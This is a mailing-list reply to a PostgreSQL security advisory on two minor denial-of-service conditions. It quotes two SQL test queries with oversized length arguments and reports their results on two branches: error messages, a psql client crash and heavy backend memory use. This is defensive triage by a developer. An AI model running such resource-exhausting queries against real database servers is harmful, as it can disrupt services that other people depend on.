Re: @(#)Mordred Labs advisory 0x0006: Two minor DoS conditions in PostgreSQL

Sir Mordred The Traitor <mordred@s-mail.com> writes:
> template1=# select substring('xxxxxxxx',2,2147483647);      

With CVS HEAD (with database encoding = SQL_ASCII and UNICODE), I get:

nconway=# select substring('xxxxxxxx',2,2147483647);
ERROR:  negative substring length not allowed

With REL7_2_STABLE, I get:

template1=# select substring('xxxxxxxx',2,2147483647);
ERROR:  MemoryContextAlloc: invalid request size 2147483651

> template1=# select bpchar('x',100000000); 

With both CVS HEAD and REL7_2_STABLE, I get:

template1=# select bpchar('x',100000000);
zsh: 7312 segmentation fault (core dumped)  ./psql template1

(note that it's the client, and not the backend, that crashes)

Although the backend does allocate a couple hundred megs of memory
while processing the query.

Although I haven't looked at the code yet, it's probably worth noting
that the two test cases posted above are not cut-and-dry DoS
opportunities, AFAICT -- however, the code may still be vulnerable.

Cheers,

Neil

-- 
Neil Conway <neilc@samurai.com> || PGP Key ID: DB3C29FC